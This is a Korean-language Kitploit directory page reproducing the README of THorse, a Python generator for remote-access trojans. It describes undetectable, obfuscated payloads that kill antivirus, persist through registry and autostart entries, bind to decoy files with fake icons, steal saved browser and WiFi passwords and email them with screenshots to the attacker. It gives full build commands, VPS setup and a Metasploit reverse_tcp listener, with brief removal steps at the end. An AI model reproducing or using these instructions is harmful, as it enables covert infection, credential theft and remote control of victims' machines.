Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
thorse — THorse is a RAT (Remote Administrator Trojan) Generator for Windows/Linux systems written in Python 3. | Kitploit
도구/GitHubGitHub/pushpenderindia/thorse
Password CrackingExploit FrameworksPayload GenerationPersistence MechanismsIDS/IPS EvasionPost-ExploitationCommand and ControlRemote Access TrojanAnti-Bot
GitHubpushpenderindia/thorse

thorse

THorse is a RAT (Remote Administrator Trojan) Generator for Windows/Linux systems written in Python 3.

6141262년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기

THorse

THorse는 Python 3으로 작성된 Windows/Linux용 RAT(Remote Administrator Trojan) 생성기입니다.

root@kitploit:~
                    이 작은 파이썬 스크립트는 정말 멋진 일을 할 수 있습니다.

면책 조항

:computer: 이 프로젝트는 오로지 좋은 목적과 개인적인 용도로만 제작되었습니다.

본 소프트웨어는 어떠한 종류의 보증도 없이 "있는 그대로" 제공됩니다. 귀하는 본 소프트웨어를 사용함에 있어 전적인 책임을 집니다. 사용에 대한 모든 책임은 최종 사용자에게 있습니다. 개발자는 이 프로그램으로 인한 오용이나 손해에 대해 어떠한 책임도 지지 않습니다.

기능

  • Windows/Linux에서 작동
  • 이메일을 통한 새 피해자 알림
  • 탐지 불가
  • 루트 또는 관리자 권한 불필요
  • 지속성
  • 피해자 PC 화면 스크린샷을 이메일로 전송
  • 공격자에게 전체 Meterpreter 접근 권한 제공
  • 트로이 목마 생성에 Metasploit 설치 불필요
  • 의존성 없는 실행 바이너리 생성
  • 약 5MB 크기의 고급 기능을 갖춘 페이로드 생성
  • 컴파일 전 페이로드 난독화, 추가 안티바이러스 우회
  • 생성된 페이로드는 Base64로 인코딩되어 역공학이 매우 어려움
  • 피해자 PC의 안티바이러스 종료 및 Windows 보안 센터 비활성화 시도
  • 멋진 컬러 인터페이스로 페이로드 생성
  • 공격자 측: 페이로드 생성 시 스크립트가 누락된 종속성을 자동 감지 및 설치
  • 악성 파일에 사용자 지정 아이콘 추가 가능
  • 내장 바인더: 실행 파일을 모든 파일[.pdf, .txt, .exe 등]에 바인딩하여 전면에서 합법적인 파일을 실행하고 백엔드에서 서비스로 악성 코드 실행 가능.
  • 시스템에서 이미 실행 중인 인스턴스 확인, 실행 중인 인스턴스가 있으면 합법적인 파일만 실행 [다중 인스턴스 금지].
  • 공격자는 Linux 시스템을 사용하여 Windows/Linux OS 모두 생성/컴파일 가능하지만, Windows 머신을 사용하면 Windows 실행 파일만 생성/컴파일 가능
  • 피해자 시스템에서 저장된 비밀번호를 검색하여 공격자에게 전송.
지원되는 검색 대상: 다음에서 저장된 비밀번호를 검색하려고 시도:
Chrome 브라우저
WiFi

참고: 사용자 지정 스틸러가 코딩되어 있으며, LaZagne에 의존하지 않음

테스트 환경

Kali) Kali Linux - ROLLING EDITION

Windows) Windows 10

Windows) Windows 8.1 - Pro

Windows) Windows 7 - Ultimate

Metasploit으로 생성된 meterpreter 페이로드의 제한사항은 다음과 같습니다:

  • 백도어 실행 전에 Metasploit 리스너를 실행해야 함
  • 백도어 자체가 지속적이지 않으므로, 지속성을 위해 사후 침투 모듈을 사용해야 함. 그리고 사후 침투 모듈은 성공적인 침투 후에만 사용할 수 있습니다.
  • 새 시스템에서 페이로드가 실행될 때 알림이 오지 않음.

Meterpreter 페이로드가 얼마나 강력한지 모두 알고 있지만, 그럼에도 불구하고 이 페이로드로 만든 것은 만족스럽지 않습니다.

이 페이로드 생성기의 기능은 다음과 같습니다. 이 파이썬 스크립트에 대한 좋은 아이디어를 제공할 것입니다:

  • Windows에서 지속성을 위해 Windows 레지스트리 사용.
  • Linux 시스템에서도 지속성 유지.
  • LINUX 및 WINDOWS 모두에서 페이로드 실행 가능.
  • 전체 액세스 제공: Metasploit 리스너를 사용할 수 있을 뿐만 아니라 사용자 지정 리스너도 지원(자체 리스너 생성 가능).
  • 새 시스템에서 페이로드가 실행될 때마다 완전한 시스템 정보와 함께 이메일 알림 전송.
  • 1분 이내에 페이로드 생성.
  • 모든 meterpreter 사후 침투 모듈 지원.
  • Windows 및 Linux 시스템에서 페이로드 생성 가능.

사전 요구 사항

  • Python 3.X
  • 몇 가지 외부 모듈

참고 사항:

Windows의 경우, paygen.py [14행]에서 Pyinstaller 경로를 지정/설정하세요.

기본 경로는 다음과 같습니다: PYTHON_PYINSTALLER_PATH = os.path.expanduser("C:/Python37-32/Scripts/pyinstaller.exe")

시스템에 맞게 변경하세요

Linux에서 사용하는 방법

root@kitploit:~
# 의존성 설치
$ 최신 python 3.x 설치

# /opt 디렉토리로 이동 (선택 사항)
$ cd /opt/

# 이 저장소 클론
$ git clone https://github.com/PushpenderIndia/thorse.git

# 저장소로 이동
$ cd thorse

# 의존성 설치
$ bash installer_linux.sh

# installer_linux.sh 실행 중 오류가 발생하면 installer_linux.py를 사용하여 설치해 보세요.
$ python3 installer_linux.py

$ chmod +x paygen.py
$ python3 paygen.py --help

# 페이로드/RAT 생성
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# 사용자 지정 AVKiller로 페이로드/RAT 생성 [기본적으로 Kill_Targets에 수많은 알려진 안티바이러스가 추가됨]
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --kill_av AntiVirus.exe

# 사용자 지정 지속성 시간으로 페이로드/RAT 생성
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --persistence 10 

참고: icon 폴더에서 사용자 지정 아이콘을 사용할 수도 있습니다. 다음과 같이 사용하세요: --icon icon/pdf.ico

VPS에서 사용하는 방법 (권장)

root@kitploit:~
# 1. VPS 설정: Digital Ocean, Linode, AWS 등 VPS 제공업체에서 Ubuntu VPS를 구매할 수 있습니다.

# 2. SSH를 통해 VPS에 연결
$ ssh username@ip_address

# 3. Linux VPS 업데이트
$ sudo apt update

# 4. Kali Linux 저장소 추가
$ sudo sh -c "echo 'deb https://http.kali.org/kali kali-rolling main non-free contrib' > /etc/apt/sources.list.d/kali.list"

# 5. gnupg 패키지 설치
$ sudo apt install gnupg

# 6. Kali 공개 키 추가
$ wget 'https://archive.kali.org/archive-key.asc' && sudo apt-key add archive-key.asc

# 7. VPS 업데이트
$ sudo apt update

# 8. Kali 우선순위 설정
$ sudo sh -c "echo 'Package: *'>/etc/apt/preferences.d/kali.pref; echo 'Pin: release a=kali-rolling'>>/etc/apt/preferences.d/kali.pref; echo 'Pin-Priority: 50'>>/etc/apt/preferences.d/kali.pref"

# 9. VPS 업데이트
$ sudo apt update

# 10. VPS에 Metasploit Framework 설치
$ sudo apt install -t kali-rolling metasploit-framework

# 참고: 위 단계는 한 번만 수행하면 됩니다.

# 11. pip3 설치
$ sudo apt install python3-pip

# 12. 이 저장소 클론
$ git clone https://github.com/PushpenderIndia/thorse.git

# 13. 저장소로 이동
$ cd thorse

# 14. 의존성 설치
$ bash installer_linux.sh

# 15. installer_linux.sh 실행 중 오류가 발생하면 installer_linux.py를 사용하여 설치해 보세요.
$ python3 installer_linux.py

$ 16. chmod +x paygen.py
$ python3 paygen.py --help

# 페이로드/RAT 생성 (Windows용 RAT을 컴파일하려면 Windows 머신에서 RAT을 빌드하고 VPS를 사용하여 원격으로 제어하십시오)
$ python3 paygen.py --ip VPS_Public_IP_Address --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# 사용자 지정 AVKiller로 페이로드/RAT 생성 [기본적으로 Kill_Targets에 수많은 알려진 안티바이러스가 추가됨]
$ python3 paygen.py --ip VPS_Public_IP_Address --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --kill_av AntiVirus.exe

# 사용자 지정 지속성 시간으로 페이로드/RAT 생성
$ python3 paygen.py --ip VPS_Public_IP_Address --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --persistence 10 

참고: icon 폴더에서 사용자 지정 아이콘을 사용할 수도 있습니다. 다음과 같이 사용하세요: --icon icon/pdf.ico

Windows에서 사용하는 방법

root@kitploit:~
# 의존성 설치
$ 최신 python 3.x 설치

# 이 저장소 클론
$ git clone https://github.com/PushpenderIndia/thorse.git

# 저장소로 이동
$ cd thorse

# 의존성 설치
$ python -m pip install -r requirements.txt

# 텍스트 편집기로 paygen.py를 열고 15행을 구성합니다. Pyinstaller 경로를 설정합니다. 기본 경로는 다음과 같습니다:
# PYTHON_PYINSTALLER_PATH = os.path.expanduser("C:/Python37-32/Scripts/pyinstaller.exe")

# 도움말 메뉴 보기
$ python paygen.py --help

# 페이로드/RAT 생성
$ python paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -w -o output_file_name --icon icon_path

# 사용자 지정 AVKiller로 페이로드/RAT 생성 [기본적으로 Kill_Targets에 수많은 알려진 안티바이러스가 추가됨]
$ python paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --kill_av AntiVirus.exe

# 합법적인 파일과 바인딩된 페이로드/RAT 생성 [모든 파일 .exe, .pdf, .txt 등]
$ python paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon/txt.ico --bind passwords.txt 

참고: icon 폴더에서 사용자 지정 아이콘을 사용할 수도 있습니다. 다음과 같이 사용하세요: --icon icon/pdf.ico

참고:- 악성 파일은 technowhorse/ 폴더 내의 dist/ 폴더에 저장됩니다.

Msfconsole을 사용하여 연결 설정

  • 연결을 설정하려면 시스템에 Metasploit-Framework를 설치해야 합니다.

  • 권장 설정: 다른 페이로드로 테스트하려면 2행에서 변경하세요.

root@kitploit:~
$ sudo msfconsole
msf3> use exploit/multi/handler
msf3> set payload python/meterpreter/reverse_tcp
msf3> set LHOST 192.168.43.221
msf3> set LPORT 443
msf3> run

업데이트 방법

  • updater.py를 실행하여 자동으로 업데이트하거나 이 GitHub 저장소에서 최신 Zip을 다운로드하세요.
  • 참고: updater.py를 사용하려면 Git이 설치되어 있어야 합니다.

사용 가능한 인수

  • 선택적 인수

참고 : -w/--windows 또는 -l/--linux 중 하나를 반드시 지정해야 합니다.

  • 필수 인수

새로운 스크린샷:

도움말 보기

페이로드 생성

이전 이미지도 참조하세요.

~이전 스크린샷:

도움말 보기

paygen.py 스크립트 실행

RAT 실행 시 지속성을 위해 레지스트리 추가

자신의 복사본을 만들어 Roaming에 저장

RAT가 보낸 보고서

피해자 PC로부터 알림 받기

기여자:

현재 이 저장소는 저(Pushpender Singh)가 관리하고 있습니다. 기여자가 되고 싶다면 멋진 기능을 추가하고 풀 리퀘스트를 보내주세요. 검토 후 이 저장소에 병합하겠습니다.

모든 기여자의 풀 리퀘스트는 이 저장소에 가치가 있다고 판단되면 수락됩니다.

TODO

  • 새 기능 추가
  • GUI 기여

Windows에서 TechNowHorse 제거:

방법 1:

  • 시작으로 이동하여 regedit를 입력하고 첫 번째 프로그램을 실행하면 레지스트리 편집기가 열립니다.
  • 다음 경로로 이동: Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run. winexplorer라는 항목이 있어야 합니다. 이 항목을 마우스 오른쪽 버튼으로 클릭하고 삭제를 선택합니다.
  • 사용자 경로 > AppData > Roaming으로 이동하면 "explorer.exe"라는 파일이 있습니다. 이것이 RAT입니다. 마우스 오른쪽 버튼으로 클릭 > 삭제.
  • 시스템을 다시 시작합니다.

방법 2:

  • 감염된 시스템에서 "RemoveTHorse.bat"를 실행한 후 PC를 다시 시작하여 현재 실행 중인 악성 파일을 중지합니다.

Linux에서 TechNowHorse 제거:

  • 텍스트 편집기로 Autostart 파일을 엽니다. Autostart 파일 경로: ~/.config/autostart/xinput.desktop

  • 다음 5줄을 제거합니다:

    root@kitploit:~
       [Desktop Entry]
       Type=Application
       X-GNOME-Autostart-enabled=true
       Name=Xinput
       Exec="destination_file_name"
    
  • 참고: destination_file_name은 -o 매개변수로 TrojanHorse에 지정한 악성 파일의 이름입니다.

  • 시스템을 재부팅한 후 아래 경로에 저장된 악성 파일을 삭제합니다.

  • TrojanHorse가 저장된 대상 경로: ~/.config/xnput

기여자

  • 전용 기여자 목록: Contributors

Pushpender Singh

:computer:

어떤 형태의 기여든 환영합니다!

참고: 기여자 목록에 포함되어야 하는데 우리가 잊어버렸다면 알려주세요!

TODO 목록

  • 자신만의 기능 제안 : )
  • GUI 개발
  • 버그 수정
  • 더 많은 브라우저 비밀번호 스틸러 추가
도구 다운로드
약어전체설명
-h--help이 도움말 메시지를 표시하고 종료
-k KILL_AV--kill_av KILL_AVAntivirusKiller : 종료할 AV의 .exe를 지정합니다. 예: --kill_av cmd.exe
-t TIME_IN_SECONDS--persistence TIME_PERSISTENT__초 후에 지속성 활성화. 기본값=10
-w--windowsWindows 실행 파일 생성.
-l--linuxLinux 실행 파일 생성.
-b file.txt--bind LEGITIMATE_FILE_PATH.pdfAutoBinder : 합법적인 파일의 경로를 지정합니다. [지원 OS : Windows]
-s--steal-password피해자 머신에서 저장된 비밀번호 탈취 [지원 OS : Windows]
-d--debug포그라운드에서 바이러스 실행
약어전체설명
--icon ICON아이콘 경로 지정, 악성 파일의 아이콘 [참고 : 반드시 .ico여야 함]
--ip IP_ADDRESS보고서를 보낼 이메일 주소.
--port PORT--ip 인수에 지정된 IP 주소의 포트.
-e EMAIL--email EMAIL보고서를 보낼 이메일 주소.
-p PASSWORD--password PASSWORD-e 인수에 지정된 이메일 주소의 비밀번호.
-o OUT--out OUT출력 파일 이름.